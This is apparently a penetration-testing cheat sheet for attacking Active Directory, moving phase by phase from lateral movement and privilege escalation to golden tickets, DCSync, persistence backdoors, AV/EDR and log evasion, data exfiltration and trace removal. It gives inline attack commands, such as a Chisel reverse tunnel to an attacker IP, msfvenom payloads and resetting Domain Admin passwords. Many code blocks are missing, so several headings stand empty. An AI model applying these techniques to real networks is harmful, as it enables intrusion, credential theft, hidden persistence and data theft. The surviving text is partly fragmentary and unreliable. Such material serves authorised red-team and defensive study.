Windows Remote Management (WinRM / PowerShell Remoting) - Ports 5985 (HTTP), 5986 (HTTPS):
Plaintext (PowerShell):
Enable PS Remoting (Needs Admin):
Evil-WinRM (Ruby - NTLM Hashes):
NetExec (nxc - WinRM):
Metasploit: exploit/windows/winrm/winrm_script_exec, auxiliary/scanner/winrm/winrm_login
winrs.exe (Windows native):
Copy files over WinRM: New-PSSession, then Copy-Item -ToSession $session ... or -FromSession $session ...
Kerberos Double Hop Problem: WinRM by default doesn't delegate credentials. Workarounds:
Pass credentials explicitly for each hop:
Register PSSession Configuration (CredSSP or RunAs):
(requires admin on intermediate host). Then Enter-PSSession -ComputerName ServerB -ConfigurationName <ConfName>.
PsExec (Sysinternals - SMB, admin on target):
Use -s for SYSTEM. Can also be used with PtH if run from a context where hash is already passed.
SMB Based (Impacket tools):
WMI Based (wmic, Impacket wmiexec.py, PowerShell Invoke-WmiMethod):
PowerShell:
wmic /node: /user: /password: process call create "command"
NTLM Relay Attacks (if SMB signing disabled/not required):
Tools: Responder.py, ntlmrelayx.py
(Interactive SMB shell)
Relay to AD CS (ESC8):
Coercion:
(Use with ntlmrelayx.py targeting AD CS or other services).
Exploiting Service Misconfigurations:
Check config:
Check perms:
(Sysinternals)
Action: If perms allow, modify binPath to payload, restart service.
Scheduled Tasks (schtasks.exe):
Legacy:
Modern:
For SYSTEM: /ru System
DCOM Lateral Movement:
Tools: Invoke-DCOM (PowerShell), Impacket dcomexec.py.
Example (Impacket):
MSSQL Linked Servers:
SCCM:
Sliver C2 Pivoting: socks5 start -P <port>, pivots named-pipe-bind <pipename>, rportfwd add -b <bind_port> -r <remote_host>:<remote_port>
Port Forwarding (e.g., Chisel, netsh):
Chisel: Server on attacker: ./chisel server -p <port> --reverse. Client on compromised host: chisel.exe client <attacker_IP>:<port> R:socks
SharpNoPSExec / NimExec: Fileless remote command execution via service manipulation.
Reg.exe (Remote Registry): If RemoteRegistry service is running and permissions allow.
E.g., IFEO debugger:
(Payload runs when msedge.exe starts). Requires AllowInsecureGuestAuth if SMB share is anonymous.
Your Goal Here: Elevate privileges from a compromised user account (standard user, local admin) to a higher level, ideally Domain Admin or Enterprise Admin on the domain, or SYSTEM on a local machine.
Pro Tip: Enumerate thoroughly on the compromised host (for local privesc) and the domain (for domain privesc). Misconfigurations, vulnerabilities, and excessive permissions are your friends. BloodHound is key for visualizing AD attack paths.
Goal: Elevate from a standard user to Local Administrator or SYSTEM on the current machine.
Tools for Enumeration & Exploitation:
PowerUp.ps1 (PowerSploit): Invoke-AllChecks
Sherlock.ps1: Find-AllVulns or Invoke-Sherlock
Seatbelt.exe: Seatbelt.exe -group=all -full
Windows Exploit Suggester - Next Generation (WES-NG): systeminfo > systeminfo.txt (on target), then wes.py systeminfo.txt (on attack machine).
Juicy Potato / Rotten Potato / PrintSpoofer / GodPotato / Lovely Potato: Token abuse (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege).
Metasploit: post/multi/recon/local_exploit_suggester, exploit/windows/local/..., post/windows/escalate/getsystem
BeRoot, Privesc.py/ps1, FullPowers.
Common Techniques:
Kernel Exploits: Identify missing patches. Caution: Unstable.
Misconfigured Services / Weak Service Permissions:
Unquoted Service Paths:
If path C:\Program Files\Some Dir\service.exe is unquoted, try placing C:\Program.exe.
Writable Service Binaries:
Replace binary, restart service.
Writable Service Registry Config:
Modify ImagePath.
DLL Hijacking for Services.
AlwaysInstallElevated:
Check:
Both must be 0x1.
Exploit: msfvenom ... -f msi -o payload.msi, then msiexec /quiet /qn /i payload.msi.
PowerUp: Get-RegistryAlwaysInstallElevated, Write-UserAddMSI.
Stored Credentials / Password Mining (Locally):
PowerShell history: Get-History or file (Get-PSReadlineOption).HistorySavePath.
Credential Manager: cmdkey /list.
Windows Vault: VaultCmd.exe /list.
Browser vaults, config files, scripts, user docs.
Group Policy Preferences (GPP) Passwords (Local/SYSVOL): PowerUp: Get-GPPPassword.
Token Impersonation/Theft (Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege):
PrintSpoofer:
(runs payload as SYSTEM).
Metasploit Incognito: use incognito, list_tokens -u, impersonate_token "NT AUTHORITY\SYSTEM".
Invoke-TokenManipulation (PowerSploit).
Scheduled Tasks with Weak Permissions.
DLL Hijacking (Applications).
PATH Interception.
CVEs: SMBGhost (CVE-2020-0796), HiveNightmare/SeriousSAM (CVE-2021-36934).
Further Reading: Windows Local Privilege Escalation Cookbook (FuzzySecurity).
Goal: Elevate from local admin/domain user to Domain Admin or Enterprise Admin.
Exploiting Kerberos Delegation:
Unconstrained Delegation:
Condition: Compromise UCD host. DA authenticates. DA's TGT cached in LSASS.
Find: Get-NetUser -Unconstrained, Get-NetComputer -Unconstrained.
Exploit: Dump LSASS (mimikatz sekurlsa::tickets /export), PtT DA's TGT.
Coerce Auth (Printer Bug/SpoolSample):
Constrained Delegation (S4U2Self, S4U2Proxy):
Find: Get-DomainUser/Computer -TrustedToAuth.
Traditional CD: If control SvcA trusted to delegate to SPN_on_Target, impersonate UserX to SPN_on_Target.
Rubeus:
Kekeo: tgt::ask ..., then tgs::s4u ...
Resource-Based Constrained Delegation (RBCD):
Condition: Write access to target computer's msDS-AllowedToActOnBehalfOfOtherIdentity.
Exploit: Modify target's attribute to allow ControlledUser to impersonate. Then S4U from ControlledUser as DA to target.
Powermad:
PowerView: Craft SD,
Rubeus (S4U):
Abusing ACLs/DACLs on AD Objects:
Condition: Compromised user has excessive perms (GenericAll, GenericWrite, WriteDACL, WriteOwner, WriteProperty for member or userPassword) on DA user/group, DC computer, GPO, OU.
Reset DA password: PowerView Set-DomainUserPassword -Identity <DA_User> -Password <NewPassword>. Native: net user <DA_User> <NewPassword> /domain.
Add to DA group: PowerView Add-DomainGroupMember -Identity "Domain Admins" -Members <YourUser>.
Tools: PowerView (Get-ObjectAcl, Find-InterestingDomainAcl), BloodHound, dsacls.exe, Set-Acl, aclpwn.py, Invoke-ACLPwn.
Dacledit.py (Impacket fork):
To add rights: -action write -rights WriteMembers -ace-type allowed
AdminSDHolder: Modify ACL on CN=AdminSDHolder,CN=System,<DomainDN>.
Shadow Credentials (msDS-KeyCredentialLink):
Condition: WriteProperty on msDS-KeyCredentialLink for target user/computer.
Tools: Whisker.exe add /target:TargetUser$, Certipy shadow auto ..., PyWhisker.
Auth with new cred:
PKINITtools:
(needs KRB5CCNAME set to ccache).
AD CS Exploitation (ESC1-ESC11, Certifried):
Tools: Certify.exe find /vulnerable, Certipy find -vulnerable ..., ForgeCert.exe (Rubeus component).
ESC1 Conditions: Template allows "Enrollee Supplies Subject" (SAN), low-priv enrollment rights, EKU allows authentication (Client Auth, Smart Card Logon, Any Purpose).
ESC1 Exploit:
ESC8 (NTLM Relay to AD CS HTTP):
Auth with cert:
MSSQL PrivEsc: If SQL service account is DA, or SQL on DC. xp_cmdshell, impersonate, trustworthy DBs.
SCCM Site Takeover: NTLM Relay to MSSQL Site DB or SMS Provider.
Abusing Trust Relationships / Trust Attacks:
Intra-Forest (Child to Parent): Unconstrained Delegation (Printer Bug), GPO on Site, GoldenGMSA, DNS Trust attack, Foreign Group/ACL abuse.
Cross-Forest: Trust Account Attack, Unconstrained Delegation, SID History Injection, SID Filter Bypass (CVE-2020-0665), Abusing SQL Server Links, Abusing PAM Trusts/Shadow Principals.
SID History Abuse (Forge Golden Ticket with EA SID from parent/root in sIDHistory).
GPO Abuse: If write access to GPO linked to DCs/sensitive OUs. Deploy malicious task/script.
PyGPOAbuse:
Specific Vulnerabilities:
ZeroLogon (CVE-2020-1472): Reset DC machine account pass. Tools: SharpZeroLogon, Invoke-ZeroLogon, ZeroDump. Mitigation: Apply security updates from August 2020 and later; enable secure RPC enforcement.
PrintNightmare (CVE-2021-1675/34527): RCE as SYSTEM via Print Spooler.
NoPAC (CVE-2021-42278/42287): Standard user to DA. noPAC C# tool, sam-the-admin.py.
sAMAccountName Spoofing (related to NoPAC): Change computer account sAMAccountName to DC's name, request TGT.
ShadowCoerce (MS-FSRVP): Coerce auth via File Server Remote VSS Protocol.
DFSCoerce (MS-DFSNM): Coerce auth via Distributed File System Namespace Management Protocol.
Certifried (CVE-2022-26923): Certificate-based machine account impersonation.
Your Goal Here: Achieve full, persistent control over the Active Directory domain. This usually means compromising Domain Admin credentials, Enterprise Admin credentials (for forest-level control), or gaining direct control of Domain Controllers and the krbtgt account.
Pro Tip: The "Golden Ticket" is the ultimate prize for domain persistence and control. DCSync provides all domain hashes.
Your Toolkit & Commands:
Golden Ticket Attack (Requires krbtgt account's NTLM hash or AES keys):
Goal: Forge a TGT for any user (real or fake) with any privileges. Signed with krbtgt credentials.
Obtain krbtgt hash/keys: Dump NTDS.dit (Phase 3).
Mimikatz (on DC):
Forge with Mimikatz:
/user: Username to impersonate.
/domain: Fully Qualified Domain Name.
/sid: SID of the domain (not the krbtgt SID).
/krbtgt: NTLM hash or AES key of the krbtgt account.
/id: Relative ID (RID) of the user to impersonate (e.g., 500 for built-in Administrator).
/groups: Comma-separated RIDs of groups to include (e.g., 512 for Domain Admins, 519 for Enterprise Admins, 518 for Schema Admins).
/ptt: Pass-the-Ticket (injects the forged ticket into current session).
Forge with Impacket ticketer.py:
(Outputs .ccache). Usage: export KRB5CCNAME=<ticket.ccache>, then Impacket tools with -k -no-pass.
Forge with Rubeus:
NTLM Hash:
AES256 Key:
Impact: Full domain compromise. Valid until krbtgt password changed twice.
Silver Ticket Attack (Requires Service Account NTLM Hash or AES keys):
Goal: Forge a TGS for a specific service on a specific server. No DC communication after forging.
Obtain Service Account Hash/Keys: Kerberoasting (Phase 3) or LSASS dump on service host.
Forge with Mimikatz:
Forge with Impacket ticketer.py:
Forge with Rubeus:
Impact: Access specific service on target server as impersonated user.
DCSync Attack (Requires DA or specific replication rights):
Goal: Impersonate a DC, request password data via DRS Remote Protocol.
Required Privs: DS-Replication-Get-Changes & DS-Replication-Get-Changes-All on the domain object.
Mimikatz:
Target specific user:
Dump all:
Impacket secretsdump.py:
Target specific user:
Dump all:
(or -just-dc-ntlm for only NTLM hashes)
AdminSDHolder Abuse: (See Phase 5 & 7) Modify ACLs on CN=AdminSDHolder,CN=System,<DomainDN>.
Skeleton Key Attack (Injects master password into LSASS on DCs):
Goal: Allows domain auth with a universal password. Original passwords still work.
Mimikatz (SYSTEM on ALL DCs):
If LSA PPL: !+, !processprotect ..., misc::skeleton, !-.
Impact: Domain-wide access. Lasts until DC reboots/LSASS restarts. Highly intrusive and detectable.
Modifying Domain Controller Group Policies: If rights to edit "Default Domain Controllers Policy" or GPOs linked to DCs OU.
Forest Trust Abuse: If EA compromised in forest root, often implicit admin in child domains. Get-NetForestTrust.
DCShadow Attack (Advanced - DA or specific rights):
Goal: Temporarily register rogue DC to push malicious AD object changes (e.g., SIDHistory, SPNs).
Mimikatz:
Detection: Network monitoring for DRSUAPI DRSUAPI_REPLICA_ADD from non-DCs. Event IDs 5136, 5141.
Your Goal Here: Ensure continued access to the compromised environment.
Pro Tip: Blend in. Use legitimate mechanisms. Golden Tickets & AdminSDHolder are powerful. Avoid noisy techniques.
Your Toolkit & Commands/Techniques:
Golden Ticket / Silver Ticket: (See Phase 6).
Pro Tip (Golden Ticket): Create Golden Tickets for non-existent users or with specific SIDs to make them harder to track. Remember, changing the krbtgt password twice invalidates all Kerberos tickets, including Golden Tickets.
DCSync Rights for Stealthy Account:
Grant DS-Replication-Get-Changes & DS-Replication-Get-Changes-All to a controlled account.
PowerView:
ADModule: Use New-Object System.DirectoryServices.ActiveDirectoryAccessRule and Set-Acl.
AdminSDHolder Backdoor: Add controlled account/group to ACL of CN=AdminSDHolder,CN=System,<DomainDN> with GenericAll rights.
PowerView:
Force SDProp: Invoke-SDPropagator.ps1 or
(risky).
Scheduled Tasks (on critical servers/DCs):
Command:
Service Creation/Modification:
Command (create):
Command (start):
Startup Scripts (GPO, Local Registry/Folder):
GPO: Modify Default Domain/DC Policy.
Registry Run Keys: HKLM\Software\Microsoft\Windows\CurrentVersion\Run, HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
Startup Folders: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp, %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.
SharpPersist: SharpPersist.exe -t startupfolder ..., -t reg ...
DLL Hijacking (Persistent).
COM Hijacking (Registry).
WMI Event Subscription (Permanent): Invoke-WMIImplant, SharpWMI.
Modifying User Logon Scripts (scriptPath attribute):
(script on accessible share like SYSVOL).
Web Shells (on IIS/web servers).
Hidden Users/Accounts: Create/modify accounts. Hide from GAL (msExchHideFromAddressLists = TRUE).
DSRM (Directory Services Restore Mode) Abuse on DCs:
Obtain DSRM hash (lsadump::sam on DC).
Enable DSRM network logon:
PtH with DSRM hash.
Custom Security Support Provider (SSP): Mimikatz: misc::memssp (logs creds). Manual: Drop mimilib.dll, add to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
Sliver C2 Implants: generate beacon --persistent ...
ACLs for Remote Management (WMI/PSRemote/Remote Registry): PowerView: Set-RemoteWMI ..., Set-RemotePSRemoting ...
Domain Controller Shadowing / Malicious Replication: (Highly Advanced & Risky) Introduce a rogue DC or manipulate replication.
Further Reading: "Sneaky Active Directory Persistence Tricks" (@PyroTek3), MITRE ATT&CK Persistence.
Your Goal Here: Avoid detection by AV, EDR, SIEM, IDS/IPS, and blue teams.
Pro Tip: "Living off the land" (LOLBAS). C2 frameworks offer evasion. Understand detection mechanisms.
Your Toolkit & Techniques:
Antivirus/EDR Evasion:
Custom Payloads/Shellcode: Packers, crypters, shellcode encoders (msfvenom -e shikata_ga_nai -i <count>), encryption.
In-Memory Execution: PowerShell
Reflective DLL Injection, Process Hollowing. Sliver: execute-assembly --amsi-bypass --etw-bypass ...
AMSI Bypass (Anti-Malware Scan Interface): Patch AmsiScanBuffer/AmsiScanString in memory. Resources: GitHub Amsi-Bypass-Powershell (e.g., by S3cur3Th1sSh1t), Invisi-Shell.
ETW Bypass/Patching: Sliver: --etw-bypass.
Disabling/Tampering with AV/EDR (Risky, SYSTEM needed, highly detectable).
Using Signed Binaries / LOLBAS (Living Off The Land Binaries and Scripts):
Concept: Execute malicious code or achieve objectives using legitimate, signed Windows binaries.
Examples: msbuild.exe, regsvr32.exe, rundll32.exe, wmic.exe, certutil.exe.
Project: lolbas-project.github.io.
Fileless Malware: Payloads reside only in memory or in non-traditional storage like the registry, WMI, ADS.
Hiding Network Traffic (C2):
Encryption: HTTPS/TLS, DNS over HTTPS (DoH)/DNS over TLS (DoT).
Port Hopping/Common Ports: Use 80, 443, 53.
Domain Fronting (Effectiveness varies).
Randomized beaconing, jitter, sleep masks. C2 Profiles (Cobalt Strike Malleable C2, Sliver profiles).
Log Evasion/Tampering:
Clearing Event Logs (Admin, VERY NOISY):
Disabling Logging (PowerShell Script Block/Module Logging): Modify GPO or registry (e.g., HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, set EnableScriptBlockLogging to 0).
Invoke-Phantom: Windows Event Log Killer.
Obfuscation:
Code (PowerShell, VBS, .NET), Command (PowerShell).
Tools: Invoke-Obfuscation.
Alternate Data Streams (ADS - NTFS):
Time Stomping (Modifying File MACB Timestamps):
PowerShell:
timestomp.exe.
Using Non-Standard Tools / Custom C2.
Masquerading / Process Doppelgänging / Herpaderping: Rename tools to look legitimate (e.g., mimikatz.exe to svchost.exe).
UAC Bypass: DiskCleanup Scheduled Task Hijack (HKCU:\Environment\windir), FodHelper Execution Hijack (HKCU\Software\Classes\ms-settings\Shell\Open\command).
AppLocker Bypass: Default rules (writable %WINDIR% subdirs like C:\Windows\Tasks), LOLBAS (InstallUtil, RunDll32).
PowerShell Constrained Language Mode Bypass: powershell.exe -Version 2, .NET assemblies/Runspaces.
Sharp-Suite: Process Argument Spoofing.
Sysmon Evasion: sysmon-config-bypass-finder.
HoneyTokens Evasion: Forging Trusts, Honeypot Buster.
Further Reading: MITRE ATT&CK Defense Evasion.
Your Goal Here: Extract sensitive data from the compromised network.
Pro Tip: Mind data size and network monitoring (DLP). Compress, encrypt, use covert channels or blend with legitimate traffic. Exfiltrate in chunks.
Your Toolkit & Techniques:
Common Protocols for Exfil:
HTTP/HTTPS: POST requests. Tools: curl, wget, PowerShell Invoke-WebRequest/Invoke-RestMethod.
DNS: Encode data in DNS queries (Base64 chunks as subdomains). Tools: dnscat2, iodine, DET. Slow but stealthy.
ICMP: Encode data in ICMP echo packets. Tools: icmpsh, ptunnel-ng, PingTunnel. Slow, often blocked.
FTP/SFTP/SCP: If available and outbound allowed.
Email: Attachments (risky, size limits, AV).
Covert Channels: Using non-standard protocols or abusing legitimate protocol fields.
Data Staging: Collect/compress data on an internal compromised machine before exfil. Compression: tar, zip, 7zip. PowerShell: Compress-Archive.
Encryption: Encrypt data before exfil (AES, PGP/GPG). PowerShell: Protect-CmsMessage. OpenSSL: openssl enc -aes-256-cbc ...
Throttling / Low and Slow: Exfiltrate data slowly to avoid traffic alerts.
Tools for Exfiltration:
PowerShell: Invoke-WebRequest, Start-BitsTransfer (BITS).
Python: requests (HTTP/S), socket.
Rclone: Manage files on cloud storage.
C2 Frameworks: Built-in exfil modules (Sliver: download, upload, loot).
Living Off The Land for Exfil: certutil.exe -encodehex ..., bitsadmin.exe.
Your Goal Here: Remove tools, logs, and traces to hinder investigation. (Often minimal in pentests where reporting is key, but crucial for real attackers).
Pro Tip: Cleanup can be noisy. Follow Rules of Engagement. Detailed reporting often preferred.
Your Toolkit & Techniques:
Removing Tools & Payloads:
Secure Delete: sdelete.exe -p <passes> -z <File>. Remove ADS.
Clearing Command History:
PowerShell: Clear-History, Remove-Item (Get-PSReadlineOption).HistorySavePath.
Bash: history -c, delete ~/.bash_history.
Reverting System Changes: Undo persistence/privesc mods (registry, services, tasks, firewall rules) if scoped and safe. Caution: Complex, risky.
Removing User Accounts/Modifications: Remove-ADUser, net user <user> /delete. Revert ACL changes.
Log Manipulation (VERY NOISY & RISKY - Avoid in Pentests unless explicitly scoped):
Restoring Original Files (if DLLs/binaries replaced): Requires backups.
C2 Framework Cleanup: Terminate beacons/implants. Remove C2 persistence. Clear C2 server logs if scoped.
Network Device Cleanup: Revert router/firewall rules. Clear logs if accessed.
Alright operator, you've got the intel. This cheat sheet is your tactical field guide for dissecting Active Directory environments, from that first network ping to the echo of domain admin privileges. Consider it your go-to when you're in the digital trenches, a quick reference to the tools and TTPs that can make or break an engagement.
The Active Directory landscape isn't static – it's a dynamic battlefield. New exploits surface, defensive technologies evolve, and attackers refine their craft. Your learning curve is therefore perpetual. Keep that curiosity ignited, sharpen your skills with relentless practice, and always operate with unwavering integrity and within the legal boundaries of your engagements.
Thank Your For Reading Wish It Helps You Buddy
